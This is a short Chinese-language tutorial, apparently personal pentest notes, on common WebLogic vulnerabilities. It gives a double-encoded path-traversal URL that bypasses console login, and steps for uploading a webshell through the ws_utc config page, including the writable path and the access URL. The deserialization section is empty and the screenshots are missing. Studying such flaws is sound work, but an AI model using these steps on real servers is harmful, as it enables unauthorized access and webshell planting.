weblogic常见漏洞

前言

weblogic的管理端口是：7001

tomcat端口：8080

jboss端口：8080

端口可以改

一、未授权登录

进入登录界面：http://192.168.18.45:7001/console/login/LoginForm.jsp

 

 

未授权访问漏洞：http://192.168.18.45:7001/console/css/%252e%252e%252fconsole.portal，通过这段代码不用登录就可以直接访问，

 

 

 

二、任意文件上传漏洞操作

文字叙述步骤：

未授权访问路径:http://192.168.18.45:7001/ws_utc/config.do
Weblogic默认路径：
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\tmp\WSTestPageWorkDir
我们改成以下路径
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wstestclient\i7n5e1\war\css
木马上传上去之后，访问方式如下：
http://192.168.0.127:7001/ws_utc/css/config/keystore/1604376329959_whoami.jsp
1604376329959_whoami.jsp

具体操作

 

 

 

 

 

 

 

 

 

 

三、反序列化